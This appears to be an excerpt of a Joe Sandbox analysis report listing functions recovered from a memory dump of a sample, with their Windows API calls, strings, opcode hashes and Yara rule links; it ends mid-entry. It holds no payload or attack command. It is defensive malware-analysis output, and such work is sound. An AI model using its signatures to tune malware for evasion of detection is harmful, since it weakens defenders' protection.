Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-1428604138
Opcode ID: 7ce86a1e280c5c101eb9d38b57348b96dcdbdc3abd11a011bc87221c0eb0ce52
Instruction ID: 9b33745c7adcf44d9ab6d018a45ac861fc4fe96963f8eb5a2dc8d5f7e9d821a7
Opcode Fuzzy Hash: 7ce86a1e280c5c101eb9d38b57348b96dcdbdc3abd11a011bc87221c0eb0ce52
Instruction Fuzzy Hash: 0111CD7A18830BF5FE156728FC0FDB7379CAB15720B20002AFF01A55D2FE9E68515654

Function 00766E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00766E3E

Part of subcall function 00768B28: __getptd_noexit.LIBCMT ref: 00768B28

__gmtime64_s.LIBCMT ref: 00766ED7
__gmtime64_s.LIBCMT ref: 00766F0D
__gmtime64_s.LIBCMT ref: 00766F2A
__allrem.LIBCMT ref: 00766F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00766F9C
__allrem.LIBCMT ref: 00766FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00766FD1
__allrem.LIBCMT ref: 00766FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00767006
__invoke_watson.LIBCMT ref: 00767077

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 37a2ea9ecf3922b8d5ae7c906154c0c74b5278d79534ca97fd01d4b0cf2267c3
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 25710776A00716EBDB14DE68DC46B6AB3A8BF043A4F148229FD15E7281E779DD008790

Function 007A2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2542
GetMenuItemInfoW.USER32(00805890,000000FF,00000000,00000030), ref: 007A25A3
SetMenuItemInfoW.USER32(00805890,00000004,00000000,00000030), ref: 007A25D9
Sleep.KERNEL32(000001F4), ref: 007A25EB
GetMenuItemCount.USER32(?), ref: 007A262F
GetMenuItemID.USER32(?,00000000), ref: 007A264B
GetMenuItemID.USER32(?,-00000001), ref: 007A2675
GetMenuItemID.USER32(?,?), ref: 007A26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2735

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 1293f429b36c94df17b3f4f17f6626e2666938f3192a367c1843718ac6c5f6d4
Instruction ID: 101d3ffb662fa4eb617d5b4cced9be5595824348b0ccdba10fd9377b6a922f7e
Opcode Fuzzy Hash: 1293f429b36c94df17b3f4f17f6626e2666938f3192a367c1843718ac6c5f6d4
Instruction Fuzzy Hash: E761C070901249EFDB11CF68DD88DBE7BB9FF86304F144259E941A3252D739AE16DB20

Function 007C6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C6FA8
GetWindowLongW.USER32(?,000000F0), ref: 007C6FCC
_memset.LIBCMT ref: 007C6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C7067

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 8bc4af1683e8988386a18a799b89e474a6d427ad0aac7f1b11742e1e6dfae9f2
Instruction ID: 899c2d7409da86891e0ee81d8a8b1e2b15a9cf4a637bd6c616ecba44a8627d5b
Opcode Fuzzy Hash: 8bc4af1683e8988386a18a799b89e474a6d427ad0aac7f1b11742e1e6dfae9f2
Instruction Fuzzy Hash: 2B615775900208AFDB11DFA4CC85FEE77B8EB09710F14416DFA14AB2A1CB75A941DFA0

Function 00796B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00796BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00796C18
VariantInit.OLEAUT32(?), ref: 00796C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00796C4A
VariantCopy.OLEAUT32(?,?), ref: 00796C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00796CB1
VariantClear.OLEAUT32(?), ref: 00796CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00796CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00796CDC
VariantClear.OLEAUT32(?), ref: 00796CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00796CF9

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 18a4494bc1ba71e5aec4776f5fa261605d8efe0af4bd9c3848692c896a2af8f2
Instruction ID: ecdfafadd4b853b6111e3f669a0db5e309a107f9c5f7d8048672e3df3fb09415
Opcode Fuzzy Hash: 18a4494bc1ba71e5aec4776f5fa261605d8efe0af4bd9c3848692c896a2af8f2
Instruction Fuzzy Hash: F6414071A00219DFCF04DF68D858DAEBBB9EF08354F00C169F955E7261DB38AA45CBA0

Function 007B9113 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007B9167
VariantInit.OLEAUT32(?), ref: 007B9238
VariantInit.OLEAUT32(?), ref: 007B9339
VariantClear.OLEAUT32(?), ref: 007B9343
VariantClear.OLEAUT32(?), ref: 007B93A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 007B931C
Null Object assignment in FOR..IN loop, xrefs: 007B91C8, 007B92F6, 007B93AE
get__NewEnum, xrefs: 007B913F
_NewEnum, xrefs: 007B9121

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
API String ID: 2862541840-1765764032
Opcode ID: 23a813aa1280af80d84bf0f1a6f2089250b1fb00e2bcc4f83445f084167a02d0
Instruction ID: 905f9b14e93e15dd04768255b48b591f3c1be9c2337b0448c8cf1aa120549183
Opcode Fuzzy Hash: 23a813aa1280af80d84bf0f1a6f2089250b1fb00e2bcc4f83445f084167a02d0
Instruction Fuzzy Hash: 71915D71A00219EBDF24DFA5C848FEEBBB8EF45710F108559F725AB280D7789945CBA0

Function 00742E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00742EAE

Part of subcall function 00741DB3: GetClientRect.USER32(?,?), ref: 00741DDC
Part of subcall function 00741DB3: GetWindowRect.USER32(?,?), ref: 00741E1D
Part of subcall function 00741DB3: ScreenToClient.USER32(?,?), ref: 00741E45

GetDC.USER32 ref: 0077CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0077CD45
SelectObject.GDI32(00000000,00000000), ref: 0077CD53
SelectObject.GDI32(00000000,00000000), ref: 0077CD68
ReleaseDC.USER32(?,00000000), ref: 0077CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0077CDFB

Strings

U, xrefs: 0077CCD0
@U=u, xrefs: 0077CD45

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: 1e41ae88844e8df7587d2ffc0ef51f88d6e3cf024559ef22ef57aa22cad0b848
Instruction ID: 3203936579330c2faae8190dc4ce9a15fc0ef1d43ac3cbd0d5d5958ecd09ea48
Opcode Fuzzy Hash: 1e41ae88844e8df7587d2ffc0ef51f88d6e3cf024559ef22ef57aa22cad0b848
Instruction Fuzzy Hash: 1071B031500205DFCF229F64C888AAA7BB5FF4D390F14826EFD595A2A6D7388C51DF60

Function 007B5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 007B5793
inet_addr.WS2_32(?), ref: 007B57D8
gethostbyname.WS2_32(?), ref: 007B57E4
IcmpCreateFile.IPHLPAPI ref: 007B57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 007B58ED
WSACleanup.WS2_32 ref: 007B58F3

Strings

Ping, xrefs: 007B5816

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: a630458905d182dff6c93176784a5380dc99bef10a92882da6b465d13b2b8d1d
Instruction ID: 25fc579c148692ce8fe38ad3742b18797cf9bf3de40a662432df6c222e1b9d5b
Opcode Fuzzy Hash: a630458905d182dff6c93176784a5380dc99bef10a92882da6b465d13b2b8d1d
Instruction Fuzzy Hash: 7F517E71604700DFDB20EF25DC49B6ABBE5EF48720F048969F956DB2A1DB78E800DB52

Function 007C6D80 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 007C6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C6E52
_wcscat.LIBCMT ref: 007C6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 007C6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C6EF2

Strings

@U=u, xrefs: 007C6E24, 007C6E38
SysListView32, xrefs: 007C6DF6
-----, xrefs: 007C6EA5

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: -----$@U=u$SysListView32
API String ID: 307300125-3470791606
Opcode ID: c7c6e0ab0c1d57bd93c9415a3865cd263dafe346ce3e0678f31ac4eabe6ad46e
Instruction ID: fdcc737c6e5e8d37b37ebb8e90f9702e0c91d0028bfec7947eb7aade84a1e872
Opcode Fuzzy Hash: c7c6e0ab0c1d57bd93c9415a3865cd263dafe346ce3e0678f31ac4eabe6ad46e
Instruction Fuzzy Hash: F4419171A00348EBDF219F64CC85FEA77A9EF08350F10442EF645E7291D6799D84CB60

Function 007AB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007AB546
GetLastError.KERNEL32 ref: 007AB550
SetErrorMode.KERNEL32(00000000,READY), ref: 007AB5BD

Strings

UNKNOWN, xrefs: 007AB575
READY, xrefs: 007AB596
INVALID, xrefs: 007AB58F
READONLY, xrefs: 007AB588
NOTREADY, xrefs: 007AB57C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 1bfebb05155d2bbdbb38e9b6e069c95dd991a54c3e0e1dfff3094c0521d0f0c5
Instruction ID: 584fe3831cbec946931a4b02e7a012752a069e5413936ba1000f4023fd451337
Opcode Fuzzy Hash: 1bfebb05155d2bbdbb38e9b6e069c95dd991a54c3e0e1dfff3094c0521d0f0c5
Instruction Fuzzy Hash: 68318375E00209DFCB00DFA8C889EBE7BB4FF86311F148229F60597292DB799A51CB51

Function 007C61D3 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007C61EB
GetDC.USER32(00000000), ref: 007C61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C61FE
ReleaseDC.USER32(00000000,00000000), ref: 007C620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007C6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007C902A,?,?,000000FF,00000000,?,000000FF,?), ref: 007C6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C62B1

Strings

@U=u, xrefs: 007C6257, 007C62B1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: 6ecbd1b1079e36b2a6c40b7374e190fcbb1ee80b0a902ea8c7aef9775cefc801
Instruction ID: edd698cdd930ff5b53826465ca7b3d94c5c176dd4ba58dcfb49c5648e8ea24b0
Opcode Fuzzy Hash: 6ecbd1b1079e36b2a6c40b7374e190fcbb1ee80b0a902ea8c7aef9775cefc801
Instruction Fuzzy Hash: E3314F72101214BFEB118F50CC8AFEA3BAAFF49765F044069FE48AA291D6799C41CB64

Function 007B88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007B88D7
CoInitialize.OLE32(00000000), ref: 007B8904
CoUninitialize.COMBASE ref: 007B890E
GetRunningObjectTable.OLE32(00000000,?), ref: 007B8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 007B8B3B
CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,007D2C0C), ref: 007B8B6F
CoGetObject.OLE32(?,00000000,007D2C0C,?), ref: 007B8B92
SetErrorMode.KERNEL32(00000000), ref: 007B8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007B8C25
VariantClear.OLEAUT32(?), ref: 007B8C35

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 2f8d6d3a8eab65e8a217a09ac09e89a3e4a5bd03913525ef1c0a1f3d33d54344
Instruction ID: 2e1fb7c4feae36e2563b6a374f806b402b04ff6ad4fbe637dd29dc8d03d73774
Opcode Fuzzy Hash: 2f8d6d3a8eab65e8a217a09ac09e89a3e4a5bd03913525ef1c0a1f3d33d54344
Instruction Fuzzy Hash: 8FC113B1608305EFC740DF64C884A6BB7E9BF89348F00495DF98A9B251DB75ED06CB62

Function 007A7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007A7A6C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: da478788cb20ecb4ddc49d44c0254f2b879d2d41727906cb4aaf62e33835a3f5
Instruction ID: 5cb8dcead5f4340b5d1f5cce8316bfdedf16b2ec8d31ad1ca5f886d8f38aae5f
Opcode Fuzzy Hash: da478788cb20ecb4ddc49d44c0254f2b879d2d41727906cb4aaf62e33835a3f5
Instruction Fuzzy Hash: 3DB19271904219DFDB04DFA4CC84BBEB7B9FF8A321F144529EA01E7251D738A941CBA1

Function 007A11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007A11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,007A0268,?,00000001), ref: 007A1204
GetWindowThreadProcessId.USER32(00000000), ref: 007A120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0268,?,00000001), ref: 007A121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 007A122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0268,?,00000001), ref: 007A1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0268,?,00000001), ref: 007A1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007A0268,?,00000001), ref: 007A129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007A0268,?,00000001), ref: 007A12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007A0268,?,00000001), ref: 007A12BC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2ee46e941ccb14265ee8d03be99f921abc1f9bf673ca47d714c2b8f9973fa8d8
Instruction ID: 02deb47572a8243c78ec3c0e514f9fd1f0329ca3c8b9e2bec6b0b86dee4e1236
